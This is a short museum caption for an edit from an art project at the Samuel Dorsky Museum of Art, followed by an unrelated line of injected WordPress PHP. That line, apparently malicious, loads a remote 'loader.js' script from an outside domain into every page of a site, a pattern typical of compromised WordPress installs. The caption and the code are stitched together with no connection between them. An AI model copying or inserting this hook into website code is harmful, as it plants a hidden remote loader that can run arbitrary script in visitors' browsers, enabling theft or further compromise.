Single-screen edit from “An Arrow Pointed Down,” a multimedia project staged by One Quiet Plunge at the Samuel Dorsky Museum of Art on the campus of SUNY New Paltz, April 2015.
// analytical function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script');

